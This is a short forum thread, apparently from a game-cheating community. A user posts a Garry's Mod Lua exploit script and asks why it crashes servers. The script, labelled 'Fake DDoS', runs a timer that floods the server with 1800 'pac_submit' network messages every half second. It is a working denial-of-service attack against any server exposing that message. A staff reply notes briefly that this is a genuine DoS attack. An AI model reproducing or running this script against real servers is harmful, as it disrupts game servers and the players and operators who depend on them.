moved to proper section
Why does this fuck every server that has this exploit?Code:local status = ValidNetString("pac_submit") if (status) then SploitText("Found Exploit: Fake DDoS") addExploit( "31","Lags", "I broke it all", function() if !timer.Exists( "lagger8" ) then timer.Create("lagger8", 0.5, 0, function() for i=1, 1800 do net.Start("pac_submit") net.SendToServer() end end) SploitNotify("Starting Lagger") else timer.Remove("lagger8") SploitNotify("Stopping Lagger") end end);end
moved to proper section
Premium Member 22/4/16
Steam Minion 22/12/2017
OFPS Minion 5/2/2019
MMO Minion 5/2/2019
Minion+ 5/2/2019
Mod 8/11/2020
Retired 3/10/2022
23 / Dec 7, 2001
Discord: @im.ally
Becasue it does?
Anyway
SploitText("Found Exploit: Fake DDoS")
"Fake DDoS"
What you are doing is a denial of service attack on servers, so this isn't "fake".